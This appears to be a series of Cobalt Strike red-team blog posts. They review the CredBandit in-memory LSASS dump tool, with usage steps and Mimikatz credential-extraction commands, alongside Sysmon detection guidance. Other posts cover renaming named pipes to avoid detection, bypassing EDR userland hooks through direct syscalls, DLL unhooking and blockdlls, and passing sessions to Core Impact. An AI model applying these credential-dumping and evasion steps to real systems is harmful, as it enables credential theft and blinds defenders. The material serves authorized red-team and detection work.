A great preventative control for this attack is for applications to validate the DLLs they load. If a rogue/untrusted DLL is used, the application will not allow it to execute. During the writing of this post, I tested by targeting a popular chat application. It used digital signatures to validate the loaded DLLs. This worked great, except the user was presented with a popup asking if they would like to run the “untrusted” code. Clicking OK allowed my payload to run (partial win?). Prevention is great, but we need to ensure we can detect attacks when it fails.

Do not allow user controlled applications to be installed in user controlled directories. Install applications in directories the user can use but not modify (i.e., C:\Program Files).

File integrity monitoring may help.
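
As a rough illustration of what that monitoring could look like, here is a minimal Python sketch that hashes every DLL under a directory and compares two snapshots. It is a sketch under stated assumptions rather than a production control: the function names snapshot, compare, and demo are hypothetical, and the demo replays the rename-and-replace steps from this post in a scratch directory with placeholder file contents.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(directory):
    """Map each DLL under `directory` (relative path) to its SHA-256 digest."""
    root = Path(directory)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() == ".dll":
            digests[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def compare(baseline, current):
    """Return (added, removed, modified) DLL paths between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(name for name in set(baseline) & set(current)
                      if baseline[name] != current[name])
    return added, removed, modified


def demo():
    """Replay the proxy DLL file moves and report what the comparison flags."""
    with tempfile.TemporaryDirectory() as scratch:
        root = Path(scratch)
        (root / "hello.dll").write_bytes(b"legitimate library")  # placeholder content
        baseline = snapshot(root)
        (root / "hello.dll").rename(root / "original.dll")       # keep the real DLL
        (root / "hello.dll").write_bytes(b"proxy library")       # drop the proxy in place
        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

In the demo, the comparison reports original.dll as newly added and hello.dll as modified, which is the file-level footprint a proxy DLL leaves behind.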

Fortunately, the payloads executed from this attack are the same. The proxy DLL is just a loader. The payloads executed by this loader may be detected through the normal means of a robust security operations program.


CredBandit (In memory BOF MiniDump) – Tool review – Part 1

One of the things I find fascinating about being on the Cobalt Strike team is the community. It is amazing to see how people overcome unique challenges and push the tool in directions never considered. I want to explore this with CredBandit. This tool has had updates since I started exploring. I’m specifically looking at this version for this blog post.

In part 2, I’ll explore the latest version and how it uses an “undocumented” feature to solve the challenges discussed in this post.

Per the author:

CredBandit is a proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel. The memory dump is done by using NTFS transactions, which allows us to write the dump to memory. Additionally, the MiniDumpWriteDump API has been replaced with an adaptation of ReactOS’s implementation of MiniDumpWriteDump.
When you dig into this tool, you will see that CredBandit is “just another minidump tool.” This is true, but there are some interesting approaches to this.
My interest in CredBandit is less in the minidump implementation than in the “duct tape engineering” used to bend Beacon to anthemtotheego‘s will.

CredBandit uses an unconventional way of transferring in memory data through Beacon by overloading the BEACON_OUTPUT aggressor function to handle data sent from BeaconPrintf() function.

There are other interesting aspects to this project, namely:

    • Beacon Object File (BOF) using direct syscalls
    • In memory storage of data (The dump does not need to be written to disk)
    • ReactOS implementation of MiniDumpWriteDump
You can read more about the minidump technique here (T1003-001) or here (Dump credentials from lsass without mimikatz).

Note on the Defense Perspective

Although the focus of this post is to highlight an interesting way to bend Cobalt Strike to a user’s will, it does cover a credential dumping technique. Understanding detection opportunities of techniques vs. tools is an important concept in security operations. It can be helpful to highlight both the offense capabilities and defense opportunities of a technique. I’ve invited Jonny Johnson to add context to the detection story of this technique, seen below in the Detection Opportunities section.

Quick Start

Warning: BOFs run in Beacon’s memory. If they crash, Beacon crashes. The stability of this BOF may not be 100% reliable. Beacons may die. It’s something to consider if you choose to use this or any other BOF.

CredBandit is easy to use, but don’t let that fool you into thinking it isn’t a clever approach to creating a minidump. All the hard work has been done, and you only need a few commands to use it.

The basic process is as follows:

  1. Clone the project:
  2. Compile CredBandit to a BOF
  3. Load the aggressor script in Cobalt Strike
  4. Launch a beacon running in context with the necessary permissions (i.e., high integrity process running as administrator)
  5. Locate the PID of LSASS
  6. Run CredBandit
  7. Wait …. 🙂
  8. Convert the CredBandit output into a usable dump
  9. Use Mimikatz to extract information from the dump

Consult the readme for details.

Let’s See This in Action

Load the aggressor script from the Cobalt Strike Script Manager

Get the PID of LSASS

Interact with a beacon running with the permissions needed to dump LSASS memory and get the PID of LSASS.

The output of ps gives us a PID of 656.

Run CredBandit to capture the minidump of LSASS

Loading the MiniDumpWriteDump.cna aggressor script added the command credBandit to Beacon.

Running help shows we only need the PID of LSASS to use the command credBandit.

This will take time. Beacon may appear to be unresponsive, but it is processing the minidump and sending back chunks of data by hijacking the BeaconPrintf function. In this example, over 80 MB of data must be transferred.

Once the Dump is complete, Beacon should return to normal. A word of caution: I had a few Beacons die after the process completed. The data was successfully transferred, but the Beacon process died. This could be due to the BOF being functional but missing error handling, but I did not investigate.

NOTE: The CredBandit aggressor script, MiniDumpWriteDump.cna, changed the behavior of BEACON_OUTPUT. This can cause other functions to fail. You should unload the script and restart the Cobalt Strike client or use RevertMiniDumpWriteDump.cna to reverse the changes.

Convert the extracted data to a usable format

The file dumpFile.txt is created in the cobaltstrike directory. This file is the result generated by “hijacking” the BEACON_OUTPUT function to write the received chunks of data from the BeaconPrintf function.

Run the command to convert this file back into something useful:


You will now have two new files in the cobaltstrike directory: .dmp and .txt.

The .txt is a backup of the original dumpFile.txt.

The .dmp is the minidump file of LSASS.

Use Mimikatz to extract information from the dump

At this point, we are done with CredBandit. It provided the dump of LSASS. We can now use Mimikatz offline to extract information.

You can use something like the following commands:

mimikatz # sekurlsa::minidump c:\payloads\credBandit\lsass.dmp
mimikatz # sekurlsa::logonPasswords

BTW, dontstealmypassword


Here is a quick demo of the tool.

Breaking down the key concepts

Beacon Object File (BOF) using direct syscalls

Direct syscalls can provide a way of avoiding API hooking from security tools by avoiding the need for calling these APIs.

CredBandit uses much of the work done by Outflank on using syscalls in Beacon Object Files. I won’t spend time on this, but here are great resources:

In memory storage of data

The minidump output is stored in Beacon’s memory vs. being written to disk. This is based on using a minidump implementation that uses NTFS transactions to write to memory:

ReactOS implementation of MiniDumpWriteDump

MiniDumpWriteDump API is replaced with an adaptation of ReactOS’s implementation of MiniDumpWriteDump:

Unconventional way of transferring in memory data through Beacon via overloaded BeaconPrintf() function

This is what I find most interesting about this project. In short, the BEACON_OUTPUT aggressor function is used to capture the base64-encoded dump that arrives as chunks from BeaconPrintf. These chunks are written to a file that can be cleaned up and decoded.

How does this hack work? It’s clever and simple. The BOF uses the BeaconPrintf function to send chunks of the base64 encoded minidump file to the teamserver. This data is captured and written to a file on disk.

The following is an example of the output file:

received output:
received output:
received output:
received output:

This minidump file is rebuilt using the script. Credential material can then be extracted using Mimikatz.
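The rebuild step can be sketched in a few lines of Python. This is only an illustration, not the project's own conversion script: it assumes the dump was base64-encoded once and then split into chunks, and that each chunk appears either after a "received output:" marker on the same line or on a line of its own. The function name rebuild_dump is hypothetical.

```python
import base64

PREFIX = "received output:"  # marker seen in the example output file


def rebuild_dump(log_text: str) -> bytes:
    """Join the base64 chunks found in the captured output and decode them."""
    chunks = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        # Assumption: a chunk may follow the marker on the same line
        # or sit on the next line by itself; accept both layouts.
        if line.startswith(PREFIX):
            line = line[len(PREFIX):].strip()
        if line:
            chunks.append(line)
    # Assumption: the chunks are slices of one base64 string,
    # so they can be concatenated before decoding.
    return base64.b64decode("".join(chunks))
```

Writing the returned bytes to a .dmp file would give Mimikatz something to load. If the chunks were encoded independently instead, each one would need to be decoded on its own before joining.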

Adjusting the Technique

The heart of this technique is based on accessing and dumping LSASS. Instead of using the suspicious activity of payload.exe accessing lsass.exe, you could find a process that regularly accesses LSASS, inject into that process, and perform your dump.

The FindObjects-BOF project may help you locate a process that has a handle to lsass.exe, with OPSEC similar to CredBandit’s, by using a BOF and direct system calls. FindObjects-BOF is “A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific modules or process handles.”

Give it a try!

Detection Opportunities

Although the focus of this post was to highlight an interesting way to bend Cobalt Strike to a user’s will, it does cover a credential dumping technique. Understanding detection opportunities of techniques vs. tools is an important concept in detection engineering. I’ve invited Jonny Johnson to provide context to the detection story of this technique.

Jonny’s detection notes are in the left column, and I have added my take in the right.

Detection Story by Jonny | Joe’s comments
Before we can start creating our detection we must identify what is the main action of this whole chain – opening a handle to LSASS. That will be the core of this detection. If we detect on the tool or code specifically, then we lose detection visibility once someone creates another code that uses different functions. By focusing on the technique’s core behavior, we prevent manually creating a gap in our detection strategy. For this piece I am going to leverage Sysmon Event ID: 10 – Process Accessed. This event allows me to see the source process that was requesting access to the target process, the target process, the granted access rights (explained in a moment), along with both the source process GUID and target process GUID.

Sysmon Event ID 10 fires when OpenProcess is called, and because Sysmon is a kernel driver, it has insight into OpenProcess in both user-mode and kernel-mode. This particular implementation uses a syscall for NtOpenProcess within ntdll.dll, which is the Native API version of the Win32 API OpenProcess.

How is this useful?

Within the NtOpenProcess documentation, there is a parameter called DesiredAccess. This correlates to the ACCESS_MASK type, which is a bitmask. This access is typically defined by the function that wants to obtain a handle to a process. OpenProcess acts as a middle man between the function call and the target process. The function in this instance is MiniDumpWriteDump. Although ReactOS’s implementation of MiniDumpWriteDump is being used, we are still dealing with Windows securable objects (e.g. processes and files). Due to this, we must follow Windows built-in rules for these objects. Also, ReactOS’s MiniDumpWriteDump is using the exact same parameters as Microsoft’s MiniDumpWriteDump API.

Don’t overemphasize tools. Fundamentally, this technique is based on detecting a process accessing LSASS.

“ReactOS’s MiniDumpWriteDump is using the exact same parameters as Microsoft’s MiniDumpWriteDump API.” It is important to focus on the technique’s primitives. There can be multiple implementations by different tools, but the technique can often be broken down into primitives.

Within Microsoft’s documentation, we can see that if MiniDumpWriteDump wants to obtain a handle to a process, it must have PROCESS_QUERY_INFORMATION & PROCESS_VM_READ access to that process, which we can see is requested in the CredBandit source code below:

However, this still isn’t the minimum rights that a process needs to perform this action on another process. After reading Microsoft’s Process Security and Access Rights we can see that anytime a process is granted PROCESS_QUERY_INFORMATION, it is automatically granted PROCESS_QUERY_LIMITED_INFORMATION. Together, these rights have a hex value of 0x1410 (this will be used in the analytic later).
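The arithmetic behind 0x1410 is a bitwise OR of the three access rights. The short Python sketch below uses the constant values from the Windows headers; the helper names combine and decode are only illustrative.

```python
# Process access rights, with their values from the Windows SDK headers.
RIGHTS = {
    "PROCESS_VM_READ": 0x0010,
    "PROCESS_QUERY_INFORMATION": 0x0400,
    "PROCESS_QUERY_LIMITED_INFORMATION": 0x1000,
}


def combine(names):
    """OR together the named rights into one access mask."""
    mask = 0
    for name in names:
        mask |= RIGHTS[name]
    return mask


def decode(mask):
    """List which of the known rights are set in an access mask."""
    return [name for name, bit in RIGHTS.items() if mask & bit]


print(hex(combine(RIGHTS)))  # 0x1410
```

Running decode on a GrantedAccess value from a log entry is a quick way to see which of these rights a handle actually received.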

Next, we want to see the file created via NtCreateTransacted. Sysmon uses a minifilter driver to monitor file system stacks indirectly, so it has insight into files being written to disk or a phantom file. One thing we have to be careful with is that we don’t know the extension the actor might use for the dump file. Bottom line: this is attacker-controlled, and if we specify it in our analytic we risk creating a blind spot, which can lead to an analytical bypass.

Lastly, a little icing on the cake would be to add a process creation event to this analytic as it would just provide context around which user was leveraged for this activity.

Data Sources/Events:

User Rights:

Process Access:

File Creation:

  • Sysmon Event ID 11

Process Creation:

A detection strategy hypothesis should account for potential blind spots. Blind spots are not bad, but should be identified.


The following analytics are not meant to be copy and paste, but more of the beginning of detection for your environment. If you only look for the access rights 0x1410, then you will create a blind spot if an actor uses ReadProcessMemory to dump LSASS. Ideally, multiple detections would be made for dumping LSASS so that blind spots could be covered along the way.
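As a rough illustration of the base condition, the Python sketch below filters parsed Sysmon Event ID 10 records for handles to lsass.exe whose granted access includes every bit of 0x1410. The dictionary layout is an assumption about how your pipeline parses events (TargetImage and GrantedAccess are Sysmon field names; EventID as an integer key is hypothetical), and matching on a superset of the mask rather than the exact value is a choice made here, not necessarily the analytic used in this post.

```python
REQUIRED_ACCESS = 0x1410  # minimum rights discussed above


def is_lsass_dump_access(event: dict) -> bool:
    """Return True for a process-access event that could support a minidump of LSASS."""
    if event.get("EventID") != 10:
        return False
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    # Sysmon reports GrantedAccess as a hex string such as "0x1410".
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    # Match any mask that contains all of the required bits.
    return (granted & REQUIRED_ACCESS) == REQUIRED_ACCESS
```

A superset match also fires on broader requests such as 0x1fffff, which trades some noise for fewer implementation-specific gaps. It still does not cover access patterns that need a different set of rights, so it should sit alongside other LSASS detections.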

Sysmon EID 10 Process Access

Regarding Detection:

Multiple combinations of access rights may be requested based on the implementation. Focus on a query to cover minimal rights needed. This will reduce blind spots based on a specific implementation.

Regarding OPSEC:

Notice that payload.exe is accessing lsass.exe. This is due to this implementation as a BOF running directly under the context of Beacon.

BOF and syscalls can be great, but maintain OPSEC awareness.

Sysmon EID 10 & EID 11

Sysmon EID 10, 11, & 1

Detection Summary

When writing a detection the first thing I do is identify the capabilities that a tool and/or technique has. This helps me narrow in on a scope. A piece of code could be implementing 3-4 techniques. When this happens, I separate these techniques and look into them separately. This allows me to create a detection strategy per capability.
When the capability is identified and the components being used are highlighted, proper scoping can be applied. We can see a commonality between this implementation and many others. That commonality is MiniDumpWriteDump and the access rights needed for that function call. This is the foundation of our detection or base condition. However, this could be evaded if an actor uses ReadProcessMemory because a different set of minimum access rights is needed. A separate detection would need to be created for this function. This is ideal as it applies an overlap of our detection to cover the blind spots that are related to a technique.
File creation and process creation are contextual attributes that can be applied back to the core detection (MiniDump). The detection shouldn’t rely on these attributes because they are not guaranteed to be present.

Cobalt Strike is not inherently malicious. It is simply a way for someone to implement an action. The intent behind that action is what determines a classification of malicious or benign. Consequently, I don’t focus on Cobalt Strike specific signatures, I look at the behavior/technique being implemented.

I like how Palantir outlines a method for documenting detection strategies using their Alerting and Detection Strategy Framework (ADS).
Jonny Johnson

Thanks to  for creating this tool.

Stay tuned for part 2 where I’ll talk about how the latest version uses an “undocumented” feature to download the minidump file instead of hijacking the BEACON_OUTPUT function.


Wait?!?! This post highlighted the need to ‘hack’ Cobalt Strike because of a lack of features.  Why isn’t this part of the toolset?

Cobalt Strike is a framework. It is meant to be tuned to fit a user’s need. Projects like this help expose areas that can be improved. This helps the team add new features, update documentation, or provide examples.


Detection References:

Learn Pipe Fitting for all of your Offense Projects

Named pipes are a method of inter-process communication in Windows. They’re used primarily for local processes to communicate with each other. They can also facilitate communication between two processes on separate hosts. This traffic is encapsulated in the Microsoft SMB Protocol. If you ever hear someone refer to a named pipe transport as an SMB channel, this is why.

Cobalt Strike uses named pipes in several of its features. In this post, I’ll walk you through where Cobalt Strike uses named pipes, what the default pipename is, and how to change it. I’ll also share some tips to avoid named pipes in your Cobalt Strike attack chain too.

Where does Cobalt Strike use named pipes?

Cobalt Strike’s default Artifact Kit EXEs and DLLs use named pipes to launder shellcode in a way that defeats antivirus binary emulation circa 2014. It’s still the default. When you see \\.\pipe\MSSE-###-server that’s likely the default Cobalt Strike Artifact Kit binaries. You can change this via the Artifact Kit. Look at src-common/bypass-pipe.c in the Artifact Kit to see the implementation.

Cobalt Strike also uses named pipes for its payload staging in the jump psexec_psh module for lateral movement. This pipename is \\.\pipe\status_##. You can change the pipe via Malleable C2 (set pipename_stager).

Cobalt Strike uses named pipes in its SMB Beacon communication. The product has had this feature since 2013. It’s pretty cool. You can change the pipename via your profile and when you configure an SMB Beacon payload. I’m also aware of a few detections that target the content of the SMB Beacon feature too. The SMB Beacon uses a [length][data] pattern and these IOCs target predictable [length] values at the beginning of the traffic. The smb_frame_header Malleable C2 option pushes back on this. The default pipe is \\[target]\pipe\msagent_##.

Cobalt Strike uses named pipes for its SSH sessions to chain to a parent Beacon. The SSH client in Cobalt Strike is essentially an SMB Beacon as far as Cobalt Strike is concerned. You can change the pipename (as of 4.2) by setting ssh_pipename in your profile. The default name of this pipe (CS 4.2 and later) is \\.\pipe\postex_ssh_####.

Cobalt Strike uses named pipes for most of its post-exploitation jobs. We use named pipes for post-ex tools that inject into an explicit process (screenshot, keylog). Our fork&run tools largely use named pipes to communicate results back to Beacon too. F-Secure’s Detecting Cobalt Strike Default Modules via Named Pipe Analysis discusses this aspect of Cobalt Strike’s named pipes. We introduced the ability to change these pipenames in Cobalt Strike 4.2. Set post-ex -> pipename in your Malleable C2 profile. The default name for these pipes is \\.\pipe\postex_#### in Cobalt Strike 4.2 and later. Prior to 4.2, the default name was random-ish.

Pipe Fitting with Cobalt Strike

With the above, you’re now armed with knowledge of where Cobalt Strike uses named pipes. You’re also empowered to change their default names. If you’re looking for a candidate pipename, use ls \\.\pipe from Beacon to quickly see a list of named pipes on a lived-in Windows system. This will give you plenty to choose from. Also, when you set your plausible pipe names, be aware that each # character is replaced with a random character (0-9a-f). And, one last tip: you can specify a comma-separated list of candidate pipe names in your ssh_pipename and post-ex -> pipename profile values. Cobalt Strike will pick from this list, at random, when one of these values is needed.
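To preview what a profile value might expand to, the behavior described above can be modeled in Python. This is a sketch of the documented behavior, not Cobalt Strike's code; the function name and the example pipe names are made up for illustration.

```python
import random

HEX_DIGITS = "0123456789abcdef"


def pick_pipename(profile_value: str, rng: random.Random) -> str:
    """Pick one candidate from a comma-separated list and fill in each '#'."""
    candidates = [c.strip() for c in profile_value.split(",") if c.strip()]
    template = rng.choice(candidates)
    # Each '#' becomes one random character from 0-9a-f.
    return "".join(rng.choice(HEX_DIGITS) if ch == "#" else ch for ch in template)


# Hypothetical profile value with two candidate names.
print(pick_pipename("mojo_####, winsock_##", random.Random()))
```

Generating a handful of samples this way makes it easier to judge whether a candidate name blends in with the pipes listed on the target.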

Simplify your Offense Plumbing

Cobalt Strike uses named pipes in several parts of its offense chain. These are largely optional though and you can avoid them with some care. For example, the default Artifact Kit uses named pipes; but this is not a requirement of the Artifact Kit. Our other Artifact Kit templates do not use named pipes. For lateral movement and peer-to-peer chaining of Beacons, the TCP Beacon is an option. To avoid named pipes from our SSH sessions, tunnel an external SSH client via a SOCKS proxy pivot. And, while a lot of our fork&run post-exploitation DLLs use named pipes for results, Beacon Object Files are another way to build and run post-exploitation tools on top of Beacon. The Beacon Object Files mechanism does not use named pipes.

Closing Thoughts

This post focused on named pipe names, but the concepts here apply to the rest of Cobalt Strike as well. In offense, knowing your IOCs and how to change or avoid them is key to success. Our goal with Cobalt Strike isn’t amazing and ever-changing default pipe names or IOCs. Our goal is flexibility. Our current and future work is to give you more control over your attack chain over time. To know today’s options, read Kits, Profiles, and Scripts… Oh my! This blog post summarizes ways to customize Cobalt Strike. Our late-2019 Red Team Operations with Cobalt Strike mixes these ideas into each lecture as well.


Pushing back on userland hooks with Cobalt Strike

When I think about defense in the current era, I think of it as a game of instrumentation and telemetry. A well-instrumented endpoint provides a defense team and an automated security solution with the potential to react to or have visibility into a lot of events on a system. I say a lot, because certainly some actions are not easy to see [or practical to work with] via today’s instrumentation methods.

A popular method to instrument Windows endpoints is userland hooking. The process for this instrumentation looks like this:

(a) load a security product DLL into the process space [on process start, before the process starts to do anything]

(b) from the product DLL: install hooks into certain APIs of interest. There are a lot of different ways to hook, but one of the most common is to patch the first instructions in a function-of-interest to jump to the vendor’s code, do the analysis, execute the patched over instructions, and resume the function just after the patch.

This method of instrumentation is popular because it’s easy-ish to implement, well understood, and was best practice in security products for a very long time. It’s still common in a lot of security technologies today.

The downside of the above instrumentation method is that it’s also susceptible to tampering and attack by an adversary. The adversary’s code that lives in a process has the same rights and ability to examine and change code as the security product that installed itself there.

The above possibility is the impetus for this blog post. I’d like to walk you through a few strategies to subvert instrumentation implemented as userland hooks with the Cobalt Strike product.

Which products use hooks and what do they hook?

Each of these techniques does benefit from awareness of the endpoint security products in play and how [also, if] they use userland hooks to have visibility.  Devisha Rochlani did a lot of work to survey different products and document their hooks. Read the Anti-virus Artifacts papers for more on this.

To do target-specific leg work, consult Matt Hand’s Adventures in Dynamic Evasion. Matt discusses how to identify hooks in a customer’s environment right now and use that information to programmatically craft a tailored evasion strategy.

Avoid Hooks with Direct System Calls

One way to defeat userland hooks is to avoid them by making system calls directly from our code.

A direct syscall is made by populating registers with arguments and a syscall number that corresponds to an API exposed to userland by the operating system kernel. The system call is then invoked with the syscall instruction. NTDLL is largely thin wrappers around these kernel APIs and is a place some products insert their hooks. By making syscalls directly from our code, and not calling them via NTDLL (or an API that calls them via NTDLL), we avoid these hooks.
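To make the "thin wrapper" idea concrete: on x64 Windows, an unpatched NTDLL syscall stub usually begins with mov r10, rcx followed by mov eax, <syscall number>. The Python sketch below inspects the first bytes of such a stub and returns the syscall number, or None if the prologue looks different (for example, because a product overwrote it with a jump). The sample bytes and the number 0x26 are illustrative only; syscall numbers vary between Windows builds.

```python
import struct
from typing import Optional

# mov r10, rcx ; mov eax, imm32  (typical start of an x64 NTDLL syscall stub)
STUB_PROLOGUE = bytes.fromhex("4c8bd1b8")


def syscall_number(stub: bytes) -> Optional[int]:
    """Return the syscall number if the stub looks unpatched, else None."""
    if len(stub) < 8 or not stub.startswith(STUB_PROLOGUE):
        # The first instructions are not what we expect, e.g. a hook's jmp.
        return None
    (number,) = struct.unpack_from("<I", stub, 4)  # little-endian imm32
    return number


clean_stub = bytes.fromhex("4c8bd1b826000000")   # illustrative sample
hooked_stub = bytes.fromhex("e9aabbccdd000000")  # starts with jmp rel32
print(syscall_number(clean_stub), syscall_number(hooked_stub))  # 38 None
```

Code that issues the syscall directly needs the same number the stub would have loaded into eax, which is why the number has to be resolved for the exact Windows build in use.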

The value of this technique is that we deny a security product visibility into our actions via this means. The downside is we have to adapt our code to working with these APIs specifically.

If a security product isn’t using userland hooks this technique provides no evasion value. If we use system calls for uninteresting (e.g., not hooked) actions–this technique provides no evasion value.

Also, be aware that direct system calls (outside of specific contexts, like NTDLL) can be disabled process-by-process in Windows 10. This is the ProcessSystemCallDisablePolicy. If something can be disabled, I surmise it can also be monitored and used for detection purposes too. This leads to a familiar situation. A technique that provides evasion utility now can also provide detection opportunities later on. This is a truism with most things offense. Always keep it in mind when deciding whether or not to use a technique like this.

With the above out of the way, what are some opportunities to use system calls from Cobalt Strike’s Beacon?

One option is to use system calls in your EXE and DLL artifacts that run Cobalt Strike’s Beacon. The blog post Implementing Syscalls in the Cobalt Strike Artifact Kit walks through how to do this for Cobalt Strike’s EXEs and DLLs. The post’s author shared that VirtualAlloc, VirtualProtect, and CreateThread are calls some products hook to identify malicious activity. I’d also go further and say that if your artifact spawns a process and injects a payload into it, direct syscalls are a way to hide this behavior from some security stacks.

Another option is to use system calls within some of your Beacon post-exploitation activities. While Beacon doesn’t use direct system calls with any of its built-ins, you can define your own built-ins with Beacon Object Files. Cornelis de Plaa from Outflank authored Direct Syscalls from Beacon Object Files to demonstrate how to use Jackson T.’s Syswhispers 1 (Syswhispers 2 just came out!) from Beacon Object Files. As a proof-of-concept, Cornelis released a Beacon Object File to restore plaintext credential caching in LSASS via an in-memory patch.

Building on the above, Alfie Champion used Outflank’s foundation and re-implemented Cobalt Strike’s shinject and shspawn as Beacon Object Files that use direct system calls. This provides a way to do process injection from Cobalt Strike, but evade detections that rely on userland hooks. The only thing that’s missing is some way for scripts to intercept Cobalt Strike’s built-in fork&run actions and override the built-in behaviors with a BOF. Hmmmmm.

Refresh DLLs to Remove Function Hooks

Another way to defeat userland hooks is to find hooks implemented as code patches and restore the functions to their original uninstrumented state. One way to do this is to find hooked DLLs in memory, read the original DLL from disk, and use that content to restore the mapped DLL to its unhooked state. This is DLL refreshing.
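The core of DLL refreshing is a compare-and-restore pass. The Python sketch below models that pass over two byte buffers standing in for the mapped code and the matching bytes read from disk. It is a simplified model rather than a working unhooker: it does not touch a live process, and it assumes the two buffers are already aligned and free of relocation differences (the easy case described for NTDLL). The function name refresh is hypothetical.

```python
from typing import List, Tuple


def refresh(mapped: bytearray, on_disk: bytes) -> List[Tuple[int, int]]:
    """Restore `mapped` from `on_disk`; return (offset, length) of each patched run."""
    if len(mapped) != len(on_disk):
        raise ValueError("buffers must cover the same code range")
    patches = []
    i = 0
    while i < len(mapped):
        if mapped[i] != on_disk[i]:
            start = i
            # Extend the run while the in-memory bytes keep differing.
            while i < len(mapped) and mapped[i] != on_disk[i]:
                i += 1
            mapped[start:i] = on_disk[start:i]  # put the original bytes back
            patches.append((start, i - start))
        else:
            i += 1
    return patches
```

The returned list doubles as a survey of where hooks were placed, which can be useful context before deciding how to proceed.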

The simplest case of DLL refreshing is to act on NTDLL. NTDLL is a good candidate, because it’s really easy to refresh. You don’t have to worry about relocations and alternate API sets. NTDLL is also a good candidate because it’s a target for security product hooks! The NTDLL functions are often the lowest-level API that other Windows APIs call from userland. A well-placed hook in NTDLL will grant visibility into all of the userland APIs that use it.

You can refresh NTDLL within a Cobalt Strike Beacon with a Beacon Object File. Riccardo Ancarani put together a proof-of-concept to do this. Compile the code and use inline-execute to run it.

If NTDLL is not enough, you can refresh all of the DLLs in your current process. This path has more peril though. The DLL refreshing implementation needs to account for relocations, apisets, and other stuff that makes the unhooked code on disk differ from the unhooked code in memory. Jeff Tang from Cylance’s Red Team undertook this daunting task in 2017 and released their Universal Unhooker (whitepaper).

I’ve put together a Beacon Object File implementation of Cylance’s Universal Unhooker. The script for this BOF adds an unhook alias to Beacon. Type unhook and Beacon will pass control to the unhooker code, let it do its thing, and then return control back to Beacon.

Both of these techniques are great options to clean your Beacon process space before you start into other offense activities.

While the above are Beacon Object Files and presume that your Beacon is already loaded, you may also find it’s worthwhile to implement DLL refreshing in your initial access artifact too. Like direct system calls, this is a way to defeat userland hooking visibility that could affect your agent loading or its initial communications.

Prevent Hooks via Windows Process Mitigations

So far, we’ve discussed ways to defeat hooks by either avoiding them or undoing them. It’s possible to prevent hooking altogether too.

I became interested in this approach, when I learned that Google Chrome takes many steps to prevent security products from loading into its process space. Google was tired of entertaining crash reports from poorly implemented endpoint security products and opted to fight back against this in their own code. I share Google’s concerns about allowing an endpoint security product to share space with my post-exploitation code. My reasons are different, but we’re very much aligned on this cause!

The above led me to experiment with the Windows 10 process mitigation policy, BinarySignaturePolicy. A process run with a BinarySignaturePolicy of MicrosoftSignedOnly will refuse to load any DLL not signed by Microsoft into that process space. This mitigation prevents some security products from loading their DLLs into the new process space.

I opted to use the above to implement blockdlls in Cobalt Strike 3.14. blockdlls is a session prepping command to run processes with this flag set. The idea of blockdlls is processes spawned by Beacon will be free to act with less scrutiny, in some situations.

There are caveats to blockdlls. The mitigation is a recent-ish Windows 10 addition. It doesn’t work on versions of Windows where this mitigation isn’t implemented. Duh! And, security vendors do have the option to get Microsoft to sign their DLLs via an attestation service offered by Microsoft. A few made this exact move after Cobalt Strike weaponized this mitigation in version 3.14.

For more information on this technique and its variations, read Adam Chester’s Protecting Your malware with blockdlls and ACG. It’s a great overview of the technique and also discusses variations of the same idea.

Like direct system calls, I see the use of process mitigations as an evasion that is also potentially its own tell. Be aware of this tradeoff. Also, like direct system calls, this is an option that has use both during post-exploitation and in an initial access artifact. Any initial access artifact that performs migration (again, Cobalt Strike’s service executables do this) could benefit from this approach in some security stacks too.

Closing Thoughts

And, there you have it. This blog post presented a few different techniques to defeat userland hooks with Cobalt Strike. Better, each of these techniques delivers benefit at different places in Cobalt Strike’s engagement cycle.

Be aware that each of these methods is beneficial in very specific circumstances. None of the above will have impact against technologies that do not use userland hooks for instrumentation. Offense is always about trade-offs. Knowing the techniques available to you and knowing their trade-offs will help you assess your situation and decide the best way forward. This is key to good security testing engagements.

Agent Deployed: Core Impact and Cobalt Strike Interoperability

Core Impact 20.3 has shipped this week. With this release, we’re revealing patterns for interoperability between Core Impact and Cobalt Strike. In this post, I’ll walk you through these patterns and provide advice on how to get benefit using Cobalt Strike and Core Impact together.

A Red Team Operator’s Introduction to Core Impact

Prior to jumping into the patterns, I’d like to introduce you to Core Impact with my voice. Core Impact is a commercial penetration testing tool and exploit framework that has had continuous development since 1998.

Impact is a collection of remote, local, and client-side attacks for public vulnerabilities and other common offense actions. We implement [with special attention to QA] our own exploits as well. While we announce 2-3 product updates per year, we push new modules and module updates in between releases too.

Impact is also a collection of post-exploitation agents for Windows, Linux, other *NIX flavors (to include OS X), and Cisco IOS. While Windows has the most features and best support, our *NIX agents are robust and useful. The pivoting model and interface for these platforms is largely unified. The Impact agent is one of my favorite parts of the product.

Core Impact also has a graphical user interface to bring all of these things together. It’s quirky and does have a learning curve. But, once you grok the ideas behind it, the product clicks and it is thought out.

While Core Impact was long-marketed as a vulnerability verification tool [notice: I’m not mentioning the automation], it’s clear to me that the product was architected by hackers. This hacker side of Core Impact is what I’d like to show you in this video walk-through:

Session Passing from Core Impact to Cobalt Strike

One of the most important forms of tool interoperability is the ability to pass sessions between platforms.

Core Impact 20.3 includes a Run shellcode in temporary process module to support session passing. This module spawns a temporary process and injects the contents of the specified file into it. The module does support spawning code x86 -> x86, x64 -> x64, and x64 -> x86.

To pass a session from Core Impact to Cobalt Strike:

[Cobalt Strike]

1. Go to Attacks -> Packages -> Windows EXE (S)
2. Press … to choose your listener
3. Change Output to raw
4. Check x64 if you wish to export an x64 payload.
5. Press Generate and save the file

[Core Impact]

1. Right-click on the desired agent and click Set as Source
2. Find the Run shellcode in temporary process module and double-click it.
3. Set ARCHITECTURE to x86-64 if you exported an x64 payload
4. Set FILENAME to the file generated by Cobalt Strike
5. Press OK

This pattern is a great way to spawn Cobalt Strike’s Beacon after a successful remote or privilege escalation exploit with Core Impact.

Session Passing from Cobalt Strike to Core Impact

